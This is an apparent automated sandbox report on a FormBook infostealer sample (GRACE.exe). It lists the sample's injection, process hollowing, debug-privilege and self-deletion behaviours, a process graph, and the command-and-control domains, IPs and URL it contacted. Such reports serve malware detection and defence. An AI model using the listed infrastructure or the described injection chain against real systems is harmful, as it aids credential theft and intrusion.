Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136E730 mov eax, dword ptr fs:[00000030h] 10_2_0136E730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135B73D mov eax, dword ptr fs:[00000030h] 10_2_0135B73D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01334F2E mov eax, dword ptr fs:[00000030h] 10_2_01334F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135F716 mov eax, dword ptr fs:[00000030h] 10_2_0135F716
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01408F6A mov eax, dword ptr fs:[00000030h] 10_2_01408F6A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CFF10 mov eax, dword ptr fs:[00000030h] 10_2_013CFF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136A70E mov eax, dword ptr fs:[00000030h] 10_2_0136A70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0140070D mov eax, dword ptr fs:[00000030h] 10_2_0140070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134FF60 mov eax, dword ptr fs:[00000030h] 10_2_0134FF60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134EF40 mov eax, dword ptr fs:[00000030h] 10_2_0134EF40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01348794 mov eax, dword ptr fs:[00000030h] 10_2_01348794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B7794 mov eax, dword ptr fs:[00000030h] 10_2_013B7794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013737F5 mov eax, dword ptr fs:[00000030h] 10_2_013737F5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013EFE3F mov eax, dword ptr fs:[00000030h] 10_2_013EFE3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133E620 mov eax, dword ptr fs:[00000030h] 10_2_0133E620
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136A61C mov eax, dword ptr fs:[00000030h] 10_2_0136A61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133C600 mov eax, dword ptr fs:[00000030h] 10_2_0133C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01368E00 mov eax, dword ptr fs:[00000030h] 10_2_01368E00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1608 mov eax, dword ptr fs:[00000030h] 10_2_013F1608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h] 10_2_0135AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134766D mov eax, dword ptr fs:[00000030h] 10_2_0134766D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h] 10_2_01347E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FAE44 mov eax, dword ptr fs:[00000030h] 10_2_013FAE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01408ED6 mov eax, dword ptr fs:[00000030h] 10_2_01408ED6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B46A7 mov eax, dword ptr fs:[00000030h] 10_2_013B46A7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CFE87 mov eax, dword ptr fs:[00000030h] 10_2_013CFE87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013616E0 mov ecx, dword ptr fs:[00000030h] 10_2_013616E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013476E2 mov eax, dword ptr fs:[00000030h] 10_2_013476E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01400EA5 mov eax, dword ptr fs:[00000030h] 10_2_01400EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01378EC7 mov eax, dword ptr fs:[00000030h] 10_2_01378EC7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013636CC mov eax, dword ptr fs:[00000030h] 10_2_013636CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013EFEC0 mov eax, dword ptr fs:[00000030h] 10_2_013EFEC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03723B7A mov eax, dword ptr fs:[00000030h] 17_2_03723B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FDB60 mov ecx, dword ptr fs:[00000030h] 17_2_036FDB60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C8B58 mov eax, dword ptr fs:[00000030h] 17_2_037C8B58
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FDB40 mov eax, dword ptr fs:[00000030h] 17_2_036FDB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FF358 mov eax, dword ptr fs:[00000030h] 17_2_036FF358
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B131B mov eax, dword ptr fs:[00000030h] 17_2_037B131B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h] 17_2_037203E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371DBE9 mov eax, dword ptr fs:[00000030h] 17_2_0371DBE9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037753CA mov eax, dword ptr fs:[00000030h] 17_2_037753CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C5BA5 mov eax, dword ptr fs:[00000030h] 17_2_037C5BA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h] 17_2_03724BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372B390 mov eax, dword ptr fs:[00000030h] 17_2_0372B390
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722397 mov eax, dword ptr fs:[00000030h] 17_2_03722397
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B138A mov eax, dword ptr fs:[00000030h] 17_2_037B138A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037AD380 mov ecx, dword ptr fs:[00000030h] 17_2_037AD380
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03701B8F mov eax, dword ptr fs:[00000030h] 17_2_03701B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373927A mov eax, dword ptr fs:[00000030h] 17_2_0373927A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037AB260 mov eax, dword ptr fs:[00000030h] 17_2_037AB260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C8A62 mov eax, dword ptr fs:[00000030h] 17_2_037C8A62
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037BEA55 mov eax, dword ptr fs:[00000030h] 17_2_037BEA55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h] 17_2_036F9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03784257 mov eax, dword ptr fs:[00000030h] 17_2_03784257
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03734A2C mov eax, dword ptr fs:[00000030h] 17_2_03734A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03713A1C mov eax, dword ptr fs:[00000030h] 17_2_03713A1C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037BAA16 mov eax, dword ptr fs:[00000030h] 17_2_037BAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FAA16 mov eax, dword ptr fs:[00000030h] 17_2_036FAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03708A0A mov eax, dword ptr fs:[00000030h] 17_2_03708A0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h] 17_2_036F5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F5210 mov ecx, dword ptr fs:[00000030h] 17_2_036F5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722AE4 mov eax, dword ptr fs:[00000030h] 17_2_03722AE4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722ACB mov eax, dword ptr fs:[00000030h] 17_2_03722ACB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370AAB0 mov eax, dword ptr fs:[00000030h] 17_2_0370AAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372FAB0 mov eax, dword ptr fs:[00000030h] 17_2_0372FAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h] 17_2_036F52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372D294 mov eax, dword ptr fs:[00000030h] 17_2_0372D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FC962 mov eax, dword ptr fs:[00000030h] 17_2_036FC962
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FB171 mov eax, dword ptr fs:[00000030h] 17_2_036FB171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371B944 mov eax, dword ptr fs:[00000030h] 17_2_0371B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372513A mov eax, dword ptr fs:[00000030h] 17_2_0372513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03714120 mov eax, dword ptr fs:[00000030h] 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03714120 mov ecx, dword ptr fs:[00000030h] 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9100 mov eax, dword ptr fs:[00000030h] 17_2_036F9100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FB1E1 mov eax, dword ptr fs:[00000030h] 17_2_036FB1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037841E8 mov eax, dword ptr fs:[00000030h] 17_2_037841E8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037751BE mov eax, dword ptr fs:[00000030h] 17_2_037751BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037769A6 mov eax, dword ptr fs:[00000030h] 17_2_037769A6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037261A0 mov eax, dword ptr fs:[00000030h] 17_2_037261A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h] 17_2_037B49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722990 mov eax, dword ptr fs:[00000030h] 17_2_03722990
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371C182 mov eax, dword ptr fs:[00000030h] 17_2_0371C182
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372A185 mov eax, dword ptr fs:[00000030h] 17_2_0372A185
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B2073 mov eax, dword ptr fs:[00000030h] 17_2_037B2073
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C1074 mov eax, dword ptr fs:[00000030h] 17_2_037C1074
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03710050 mov eax, dword ptr fs:[00000030h] 17_2_03710050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h] 17_2_0371A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h] 17_2_0370B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372002D mov eax, dword ptr fs:[00000030h] 17_2_0372002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03777016 mov eax, dword ptr fs:[00000030h] 17_2_03777016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C4015 mov eax, dword ptr fs:[00000030h] 17_2_037C4015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F58EC mov eax, dword ptr fs:[00000030h] 17_2_036F58EC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F40E1 mov eax, dword ptr fs:[00000030h] 17_2_036F40E1
Enables debug privileges
Source: C:\Users\user\Desktop\GRACE.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\GRACE.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 216.250.110.35 80
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\GRACE.exe Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\GRACE.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 16B0000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\GRACE.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\GRACE.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
Source: C:\Users\user\Desktop\GRACE.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: AD2008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\GRACE.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: explorer.exe, 00000010.00000000.296358359.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\GRACE.exe Queries volume information: C:\Users\user\Desktop\GRACE.exe VolumeInformation
Source: C:\Users\user\Desktop\GRACE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\GRACE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\GRACE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: unknown Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Behavior Graph:

Behavior Graph ID: 344817
Sample: GRACE.exe
Startdate: 27/01/2021
Architecture: WINDOWS
Score: 100

Numbers following a process name are the graph's counts of created registry values and created files for that process (graph icon legend).

Start node
  • Contacted: www.sterlworldshop.com; www.11sxsx.com; 5 other IPs or domains
  • Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures
  • Started: GRACE.exe (15 4)

GRACE.exe (15 4), started
  • Dropped: C:\Users\user\AppData\...\AddInProcess32.exe (PE32)
  • Dropped: C:\Users\user\AppData\Local\...\GRACE.exe.log (ASCII)
  • Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
  • Started: AddInProcess32.exe

AddInProcess32.exe, started by GRACE.exe
  • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
  • Injected: explorer.exe

explorer.exe, injected by AddInProcess32.exe
  • Contacted: www.dl888.net (216.250.110.35, 49739, 80, DXTL-HKDXTLTseungKwanOServiceHK, Hong Kong); www.ludisenofloral.com; 3 other IPs or domains
  • Signatures: System process connects to network (likely due to code injection or exploit)
  • Started: netsh.exe

netsh.exe, started by explorer.exe
  • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  • Started: cmd.exe (1)

cmd.exe (1), started by netsh.exe
  • Started: conhost.exe

conhost.exe, started by cmd.exe

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
216.250.110.35 unknown Hong Kong 134548 DXTL-HKDXTLTseungKwanOServiceHK true

Contacted Domains

Name IP Active
www.luxusgrotte.com 217.160.0.171 true
gfw.cloud301.net 141.164.47.167 true
www.dl888.net 216.250.110.35 true
shops.myshopify.com 23.227.38.74 true
www.internetmarkaching.com 104.21.69.246 true
www.hongreng.xyz unknown unknown
www.ludisenofloral.com unknown unknown
www.11sxsx.com unknown unknown
www.sterlworldshop.com unknown unknown
www.kornteengoods.com unknown unknown
www.hotvidzhub.download unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.dl888.net/jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc true Avira URL Cloud: safe unknown